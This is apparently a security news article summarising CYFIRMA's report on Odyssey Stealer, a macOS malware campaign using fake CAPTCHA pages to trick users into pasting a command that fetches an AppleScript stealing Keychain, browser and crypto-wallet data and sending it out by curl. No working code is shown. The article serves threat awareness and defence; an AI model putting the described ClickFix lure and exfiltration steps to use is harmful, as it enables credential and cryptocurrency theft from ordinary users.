Threat Actors Use Clickfix Tactics to Deploy Malicious AppleScripts for Stealing Login Credentials

In a recent discovery by the CYFIRMA research team, a sophisticated malware campaign dubbed Odyssey Stealer has been uncovered, targeting macOS users through a deceptive method known as Clickfix tactics.

This campaign leverages typosquatted domains malicious websites mimicking legitimate ones like the macOS App Store, finance platforms, or cryptocurrency news portals to trick users into executing harmful AppleScripts (osascripts).

These scripts are engineered to harvest sensitive data, including browser cookies, saved passwords, cryptocurrency wallet information, and browser extensions, posing a severe threat to individuals, particularly those engaged in financial and crypto activities.

Odyssey Stealer Targets macOS Users

The operation, linked to a command-and-control (C2) panel primarily hosted in Russia, showcases a professional-grade data theft mechanism that prioritizes Western users in the United States and the European Union while avoiding victims in CIS countries, a pattern often associated with Russian-aligned cybercriminal groups.

The Clickfix technique begins with the creation of visually similar or typosquatted domains designed to exploit user typing errors.

Upon visiting these malicious sites, users are greeted with a fake Cloudflare-style CAPTCHA prompt, accompanied by instructions to copy and paste a Base64-encoded command into their terminal.

According to Cyfirma, this command fetches and executes a non-obfuscated osascript from servers like odyssey1[.]to or specific IP addresses, triggering a cascade of malicious activities.

Finance and Crypto Enthusiasts at High Risk

The script creates a temporary directory, such as /tmp/lovemrtrump, to store stolen data, copies macOS Keychain files for credential theft, and deploys fake authentication prompts to capture user passwords.

It further targets desktop cryptocurrency wallets like Electrum, Coinomi, and Exodus, alongside browser data from Chrome, Firefox, and Safari, extracting private keys, seed phrases, session tokens, and personal files from Desktop and Documents folders.

The stolen data is then compressed into a ZIP file (out.zip) and exfiltrated via a curl POST request to attacker-controlled servers, with persistent retry mechanisms ensuring delivery even under intermittent network conditions.

Odyssey Stealer, a rebranded evolution of Poseidon Stealer and a fork of the AMOS Stealer, demonstrates advanced capabilities in the macOS malware-as-a-service ecosystem.

Its control panel offers attackers a structured interface to manage infected devices, customize malware builds, and hijack browser sessions using stolen cookies.

The malware’s focus on over 100 browser extensions, particularly cryptocurrency-related ones like MetaMask, underscores its intent to maximize financial gain.

To combat this threat, organizations and individuals must adopt robust endpoint security solutions, implement threat intelligence, and configure firewalls to block known malicious IPs and domains.

Continuous network monitoring, behavior-based anomaly detection, and security awareness training are critical to mitigating risks from such social engineering attacks.

As Odyssey Stealer continues to evolve under the suspected maintenance of “Rodrigo,” a key figure behind Poseidon and AMOS, vigilance and adaptive defenses remain paramount.

Indicators of Compromise (IoC)